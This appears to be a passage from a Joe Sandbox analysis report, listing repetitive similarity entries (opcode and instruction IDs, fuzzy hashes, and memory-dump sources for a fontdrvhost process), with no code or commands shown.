                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: b58eaf1b71a76412f95f3e751f3d9ca31604990645ab8544dc6ece4036e575cc
                                                                                                                                                                                              • Instruction ID: f69ae1c715b96dcfb26e804c6158ecaf576ad6c1d01675c2cac8186cb0532322
                                                                                                                                                                                              • Opcode Fuzzy Hash: b58eaf1b71a76412f95f3e751f3d9ca31604990645ab8544dc6ece4036e575cc
                                                                                                                                                                                              • Instruction Fuzzy Hash: A8215330E1D94E8FCB94DFA8D8A09EDBBB1FF48311F510179D00AE72A1DA246941CB50
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 5a451473016b8ac16447f45d8034f3478e87e46d3788005cc9ea90544b646de3
                                                                                                                                                                                              • Instruction ID: f2230557274ae9043406dce067d7d2d10cbeabfaeac5fb7c7dd6ea7cf5569a24
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a451473016b8ac16447f45d8034f3478e87e46d3788005cc9ea90544b646de3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 13211074A19A1D9FDF54EBA8C8909FDB771FF68740F510179D00AE32A1DE2579018750
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 0032b3a6e9bd7e82e0f5886e8a98ac006a84802c191f70bd2f3904a281e0068f
                                                                                                                                                                                              • Instruction ID: 7eb1eb7e8898dd81491458590cbde9215bb66ca87eaa6241df746edb515bb85b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0032b3a6e9bd7e82e0f5886e8a98ac006a84802c191f70bd2f3904a281e0068f
                                                                                                                                                                                              • Instruction Fuzzy Hash: A4112771B0D94D4FDB58E7A898627ECB7E0EF55310F1501BAE14EC72D3DE186A428380
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: da43712999568228b3c9013a32ab731fd0962af46f9de8f0b161bececacc7a34
                                                                                                                                                                                              • Instruction ID: 7cff7b4713e2b02cfc2a48a6b2eb7d3fe26db30a9bf39401a4bdb150769d62ee
                                                                                                                                                                                              • Opcode Fuzzy Hash: da43712999568228b3c9013a32ab731fd0962af46f9de8f0b161bececacc7a34
                                                                                                                                                                                              • Instruction Fuzzy Hash: 27115621B0EA8E5FE37192F848A46AF3F90EF57301B0505BAE089D71A2DD082A068391
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 82222cb8dab77a385415337b30dcf8df6c6383e567c6fb4dbf336ac2d31181a0
                                                                                                                                                                                              • Instruction ID: 2861a2bd34a38340dd15808b75ca0b93c59e84a0aae9564bfd83d7ccbd818b49
                                                                                                                                                                                              • Opcode Fuzzy Hash: 82222cb8dab77a385415337b30dcf8df6c6383e567c6fb4dbf336ac2d31181a0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 81115931B0F78D0FE77496B448A95FD3BE1EF5A350F06057BD00AD71A2ED5869068341
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 421bd67c95f52a4c7db649bc37a28df704b61f0ac7db56dd1f6fc6bd81083bc9
                                                                                                                                                                                              • Instruction ID: e7f2cc5a2ecf4da431c668a4b6bf9bd4312423baee8b82e370ded98b913ecff6
                                                                                                                                                                                              • Opcode Fuzzy Hash: 421bd67c95f52a4c7db649bc37a28df704b61f0ac7db56dd1f6fc6bd81083bc9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C210C71E1950D9FDBACDB68C4A6AADB7A1EF58300F4100BDE04FD72A1DE74A9418B40
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: aba63e36f02c2304fc167feae4a0bd63309580ba6b5d619c0e82b1c2128502ca
                                                                                                                                                                                              • Instruction ID: c5499f3bd00520e346c0a748614376e275948f48e766172be68b4a2deeddbe84
                                                                                                                                                                                              • Opcode Fuzzy Hash: aba63e36f02c2304fc167feae4a0bd63309580ba6b5d619c0e82b1c2128502ca
                                                                                                                                                                                              • Instruction Fuzzy Hash: B9110A20A1D47E97F63C96A884F09BC7255FF90301B35867DD05F8B4EACD2CBA81A790
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: bfcfc730e64f14451d993301a80eb5a6ff0dda16c6c6920e86688c18fe9c41ce
                                                                                                                                                                                              • Instruction ID: 4d8c6ad2a2b0a05a0da647bc7e72a48c152e7bbda17c2d502e24066369a4d942
                                                                                                                                                                                              • Opcode Fuzzy Hash: bfcfc730e64f14451d993301a80eb5a6ff0dda16c6c6920e86688c18fe9c41ce
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F11C42071DA8D4ECB99EB7995619FA7B91EF49210B440ABAD58EC30E3DE14F51AC380
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 18e71059baf389c5087c502d5c498a7e5d2a3343278e38700e34f8fdc1068c8c
                                                                                                                                                                                              • Instruction ID: 7b087288f849d0ceaa587a0613d3fb6879f662fcf53d14a0f9b59e00cd01a6f9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 18e71059baf389c5087c502d5c498a7e5d2a3343278e38700e34f8fdc1068c8c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 56113331B1DD0E4FEF64EFE8C468AB823D2EF98700F520175D05ED31A2DD38AA418600
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: c6b479c2d0e661453c5b7223fceabe4ce67cd8477549b8f39e63e84fcc29d913
                                                                                                                                                                                              • Instruction ID: 012f0dd988d8ad625fab44115988bc13bf390209a191c1cdb66d46febd90838c
                                                                                                                                                                                              • Opcode Fuzzy Hash: c6b479c2d0e661453c5b7223fceabe4ce67cd8477549b8f39e63e84fcc29d913
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B113321F1DD1E4FEBB4EB9888686B86291FF4C710F5601B5D46DE32B2EE386E414740
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: df359a8b9d03441c614290d129347f2ceb586a3af6dc74548068f78635a13b47
                                                                                                                                                                                              • Instruction ID: 2c41f12fb7ab35976b5acb5e4fde0ec363f5368810680cf02ae5261a4a083672
                                                                                                                                                                                              • Opcode Fuzzy Hash: df359a8b9d03441c614290d129347f2ceb586a3af6dc74548068f78635a13b47
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7211DF30B0994E8FD758EBA881A096CF7A1FF89310B5042A9D02ED7292CF24B911CB80
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 63f5fbee5b9c70cd14d6f56cca6df2f37b21b22d7255fe3c6684db4ab5a8f47c
                                                                                                                                                                                              • Instruction ID: 497ab457e8b5c746b21acd2039e5063d4c88f5aa04dc7f4fbb8926a613a3bdb3
                                                                                                                                                                                              • Opcode Fuzzy Hash: 63f5fbee5b9c70cd14d6f56cca6df2f37b21b22d7255fe3c6684db4ab5a8f47c
                                                                                                                                                                                              • Instruction Fuzzy Hash: A8012B32F0F68D0FE77496F804655BD3BE1EF9B350F05057AE00ADB1A2ED656A058341
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: e37fcb53a11a5f6b9bfde21d1886d8ebea3c4d7be16e9359c1f97825a9088dd6
                                                                                                                                                                                              • Instruction ID: 65f48b666d9c0da60382355cb1b35a95fd7c7fb30d904384d77274bf35e6357a
                                                                                                                                                                                              • Opcode Fuzzy Hash: e37fcb53a11a5f6b9bfde21d1886d8ebea3c4d7be16e9359c1f97825a9088dd6
                                                                                                                                                                                              • Instruction Fuzzy Hash: AC11483130D58E4FD75ACF78D4A57F97B91EB85310F1805AADA8AC32E2CA15A626C780
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 87c787e44aa709970115ebf47146452fef11f5b50bfc285e39a5739032a6503a
                                                                                                                                                                                              • Instruction ID: 621408f05f19c87fa7be182f68347213c25b6bb27a71e04a02c6221bbd52b116
                                                                                                                                                                                              • Opcode Fuzzy Hash: 87c787e44aa709970115ebf47146452fef11f5b50bfc285e39a5739032a6503a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 53111930A1990D8FDB9CDB68D465AADB7A1EB58314F4101BEE04EE32A1CE74A9818B40
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 578a36c9d7ca8c37d7fc6c1d65bf827c1661314db8a4252dacd4fdbc731d3f8c
                                                                                                                                                                                              • Instruction ID: 076af7c9b7ad109c3823de36a4d6f55eb7fab0b2a7437ee2b723bc1e2b8dfdb1
                                                                                                                                                                                              • Opcode Fuzzy Hash: 578a36c9d7ca8c37d7fc6c1d65bf827c1661314db8a4252dacd4fdbc731d3f8c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3111443134D68D4FD749CFACD4A57E83B90DF86220F1809AAEA49C72E2C965A658C340
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 70f92031c1d92ef98d3513fd0482377ee2bf6eb88fa4605258b6585a31972b57
                                                                                                                                                                                              • Instruction ID: 8e315469fb8090def23a4157c27a8c1d68d4a99293051346b5755fb913190fa6
                                                                                                                                                                                              • Opcode Fuzzy Hash: 70f92031c1d92ef98d3513fd0482377ee2bf6eb88fa4605258b6585a31972b57
                                                                                                                                                                                              • Instruction Fuzzy Hash: 78110631B1EA4D8FE7129FB4882119C7BB0EF56710F0644B3C054DB1A2D5382B498790
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 4ab73c48f8841b8325958577676a09862fe076eb7f9d9d97cab9e496de5dc125
                                                                                                                                                                                              • Instruction ID: 9a445ba8e06863a7c4448b2522f0a2b9d824201c385fa4e083ee23e3b2803664
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ab73c48f8841b8325958577676a09862fe076eb7f9d9d97cab9e496de5dc125
                                                                                                                                                                                              • Instruction Fuzzy Hash: 61018431B1998C8FDB55EBF898A26ECBBB1EF4A310B050569D04ED71A3DA245912C740
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 244391b1d7c0843d6933eef85f72d188f18dac8f0fb2535fab31c9441f4f8fa3
                                                                                                                                                                                              • Instruction ID: 13c0df0745e17db219dfa3206f223304db5336bad4dfb9fa7dd6a41d0dc0ce2a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 244391b1d7c0843d6933eef85f72d188f18dac8f0fb2535fab31c9441f4f8fa3
                                                                                                                                                                                              • Instruction Fuzzy Hash: E7115E62F5F59F86F6FC56F928B21BC5941EF55710F260276D41F470E19C4C27412682
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 4f9c43a73d8a0bdea18313f14a74789c276fe094cdaaa03ffd6006284a255ed9
                                                                                                                                                                                              • Instruction ID: 0e8adf2954996361ba1e402eabe4240bc6da07029ec3613cc98454f2a15db005
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f9c43a73d8a0bdea18313f14a74789c276fe094cdaaa03ffd6006284a255ed9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C016130B19A4E8FCB58DBAC85A196CB3A2FF89700B154268D05AD3696CE24BD12C785
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 67714c43c4c2a914ef689a71c66e1ecd6443f83611f44b5065c26baf53b993dc
                                                                                                                                                                                              • Instruction ID: d29c81e7e8ea41281fb5b3256e33c77e32f728a626a2334d26dc70bca9981005
                                                                                                                                                                                              • Opcode Fuzzy Hash: 67714c43c4c2a914ef689a71c66e1ecd6443f83611f44b5065c26baf53b993dc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5911DA74E1991EDFCB98DB98D4A49FDBBB1FF58300F510179E00AE32A1DA356941CB50
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 3cd3ec572e717ef32bf7f65ca606ec751998278ac4ea6d773a01082de461b169
                                                                                                                                                                                              • Instruction ID: 70c58308fa89f6ec7d16071873fcc47ad16e776503b1f480469c45b62507cd37
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3cd3ec572e717ef32bf7f65ca606ec751998278ac4ea6d773a01082de461b169
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D01ED32B1EA8C8FE7229FA4882019C7BB0EF56710F0640F3D054DB2A2D9386B498790
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 527fcc8660d48d619b000fb39417f70fe2a7fd794c42367be5a6fe2b7532c03c
                                                                                                                                                                                              • Instruction ID: 92956e8f1fe5970ebf438f69404d5b09e54314c59dfff53fdc51a05a2a8083b9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 527fcc8660d48d619b000fb39417f70fe2a7fd794c42367be5a6fe2b7532c03c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1AF0A93144E2C44FD3129B748C29991BFE0EF1721070E82EED0C9CB4B3C21D8486C701
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: d215cf44c839fe5fe1e0f627055824f808eada76360636272eb0d1c3ae9472ea
                                                                                                                                                                                              • Instruction ID: 944eadd8ead87be530bfca1fcd37c08bdaee1408a7c8a91322d84a0a9c123244
                                                                                                                                                                                              • Opcode Fuzzy Hash: d215cf44c839fe5fe1e0f627055824f808eada76360636272eb0d1c3ae9472ea
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E019E31E1EA8D9FE712DFB4886019D7BB0EF16714F1641F3D054DB2A2E9386B458781
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 22e421521331d21acbdad0439a3bfce13ddfee1ba6c6fa14d764ef8e026a3bf9
                                                                                                                                                                                              • Instruction ID: 0f60890639d7607e417b52588babd02c071a3f3af97a17c675f00f6c86e3c528
                                                                                                                                                                                              • Opcode Fuzzy Hash: 22e421521331d21acbdad0439a3bfce13ddfee1ba6c6fa14d764ef8e026a3bf9
                                                                                                                                                                                              • Instruction Fuzzy Hash: D8010CB090895E8FCFA8DF14C494FA877B1EB64301F1441EDD00DE3291DA30AA80CF11
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 30610c7a03cc53316e70339aaa572cbae9dc47a6ff7cfce15c8662f76da46b13
                                                                                                                                                                                              • Instruction ID: a2eb03e098a4c50fe3e5c92bf9b475b0c8dbff4443de2dc6bfb0cabfa7d8abf4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 30610c7a03cc53316e70339aaa572cbae9dc47a6ff7cfce15c8662f76da46b13
                                                                                                                                                                                              • Instruction Fuzzy Hash: 05F0C83254F2C95FD7228BB088615D93FB0EF43304B1A41F6E045C70A2C96C5606C351
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: ea7e2bdc7686ae629657b90d082fad6856b9a0518e278cfe6e248faab2468ad5
                                                                                                                                                                                              • Instruction ID: ba9835db86403fa88ed01ff0174400902c3c43f130204eabc9fe060ceaff2b70
                                                                                                                                                                                              • Opcode Fuzzy Hash: ea7e2bdc7686ae629657b90d082fad6856b9a0518e278cfe6e248faab2468ad5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 86015870909A5DCFCF59EBA8C895EACBBB1FF69345F14019DC00AEB261CA71A941DF40
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 332bf0a41f1fae592f3ba302e9150512cfa17d9af7455ba1a922510162098f68
                                                                                                                                                                                              • Instruction ID: 8209d5228cea2e8380c3c50f8d4275420f55f8197fee9e3fa3c528fee7bb39eb
                                                                                                                                                                                              • Opcode Fuzzy Hash: 332bf0a41f1fae592f3ba302e9150512cfa17d9af7455ba1a922510162098f68
                                                                                                                                                                                              • Instruction Fuzzy Hash: 33018F31E1EB8D9FE722DBB4886019D7BB0EF16714F1641E3D054DB2A2E9386B448741
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1769741204.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9b880000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 761e2923b077f2d9600d50a95bc5eded3f37b587bffd50bfc0c14b2e65bdc6d3
                                                                                                                                                                                              • Instruction ID: 962eff0d0c97d38953c111d6718577aeca361bb4cf7ceb49db6a33d431c36feb
                                                                                                                                                                                              • Opcode Fuzzy Hash: 761e2923b077f2d9600d50a95bc5eded3f37b587bffd50bfc0c14b2e65bdc6d3
                                                                                                                                                                                              • Instruction Fuzzy Hash: EBF03630B1991E4FEB74EF94C864AF873A1FF48711F5201B9C49EE31B1DD386A818A40
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000004.00000002.1773636001.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffd9bc70000_fontdrvhost.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
